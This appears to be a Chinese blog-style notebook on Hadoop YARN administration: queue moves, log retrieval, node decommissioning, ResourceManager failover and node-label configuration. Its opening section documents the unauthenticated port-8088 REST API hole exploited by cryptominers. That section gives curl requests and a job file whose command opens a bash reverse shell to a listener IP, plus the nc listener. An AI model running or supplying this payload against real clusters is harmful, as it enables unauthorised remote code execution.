8088挖矿漏洞

发起获取appID
curl -X POST http://10.33.21.190:8088/ws/v1/cluster/apps/new-application

新建任务信息文件1.json反弹shell
{
‘application-id’: ‘application_1639358619460_0019’,
‘application-name’: ‘get-shell’,
‘am-container-spec’: {
‘commands’: {
‘command’: ‘/bin/bash -i >& /dev/tcp/10.17.41.129/8888 0>&1’
}
},
‘application-type’: ‘YARN’
}

启动监听
nc -lvvp 8888

发起任务
curl -s -i -X POST -H ‘Accept: application/json’ -H ‘Content-Type: application/json’ http://10.33.21.190:8088/ws/v1/cluster/apps –data-binary @1.json

application修改队列

yarn application -movetoqueue application_1667986310829_98856 -queue spark

查看日志

Yarn:
http://xx:8088/cluster?user.name=yarn
http://xx:8088/proxy/application_1660270769302_1399007
hdfs dfs -ls /spark2-history/ |grep application_1660270769302_1399007
hdfs dfs -ls /app-logs/xx/logs/application_1660270769302_3305625 |head

yarn logs -appOwner xx -applicationId application_1660270769302_3305625 -out t1
find t1 -name “01_000001“

节点服役退役

节点服役

hadoop/etc/hadoop/dfs.include
hdfs dfsadmin -refreshNodes

节点退役

yarn

echo “10.17.41.133” > nodemanager.excludes

vi yarn-site.xml

<property> 
<name>yarn.resourcemanager.nodes.exclude-path</name> 
<value>/data/hadoop-2.8.3/etc/hadoop/nodemanager.excludes</value> 
</property>

yarn rmadmin -refreshNodes -g [timeout in seconds] -client|server

节点NM进程会自动结束

主备切换

yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby –forcemanual rm2
yarn rmadmin -transitionToActive –forcemanual rm1

node-label

一个节点只有一个标签，默认属于DEFAULT
通过配置队列使用标签资源的比例
只有Capacity Scheduler调度器支持Node Labels分区调度
标签分为排他和非排他
- 排他：只属于该标签资源
- 非排他：标签也属于DEFAULT

启动配置

yarn-site.xml

yarn.node-labels.fs-store.root-dir|hdfs:///yarn/node-labels/
yarn.node-labels.enabled|true
yarn.node-labels.configuration-type| “centralized”, “delegated-centralized” or “distributed”. Default value is “centralized”.

yarn.resourcemanager.scheduler.class|org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacityScheduler

capacity-scheduler.xml

<configuration>
  <property>
    <name>yarn.scheduler.capacity.root.queues</name>
    <value>default,DEMO</value>
  </property>
  <property>
    <name>yarn.scheduler.capacity.root.DEMO.capacity</name>
    <value>0</value>
  </property>
   <property>
    <name>yarn.scheduler.capacity.root.a17.maximum-applications</name>
    <value>20</value>
  </property>
  <property>
    <!-- 配置可访问分区。逗号分割的分区列表，必须 -->
    <name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels</name>
    <value>DEMO</value>
  </property>
  <property>
    <!-- 配置队列所有祖先队列DEMO分区容量，必须 -->
    <name>yarn.scheduler.capacity.root.accessible-node-labels.DEMO.capacity</name>
    <value>100</value>
  </property>
  <property>
    <!-- 配置队列在DEMO分区容量，必须 -->
    <name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels.DEMO.capacity</name>
    <value>100</value>
  </property>
  <property>
    <!-- 配置队列在DEMO分区最大容量，可选，默认为100 -->
    <name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels.DEMO.maximum-capacity</name>
    <value>100</value>
  </property>
  <property>
    <!-- 配置队列作业容器请求默认提交分区，可选，默认为DEFAULT分区"" -->
    <name>yarn.scheduler.capacity.root.myqueue.default-node-label-expression</name>
    <value>DEMO</value>
  </property>
<configuration>

yarn rmadmin -refreshQueues

## 操作命令

```shell
yarn rmadmin -addToClusterNodeLabels "label_1(exclusive=true/false),label_2(exclusive=true/false)" #默认为排他

yarn cluster --list-node-labels

**Centralized**
yarn rmadmin -replaceLabelsOnNode "主机名[:port]=label1 主机名=label2"

yarn node -status <NodeId>

Manhua

Never Say Die

yarn

8088挖矿漏洞

application修改队列

查看日志

节点服役退役

节点服役

节点退役

yarn

主备切换

node-label

启动配置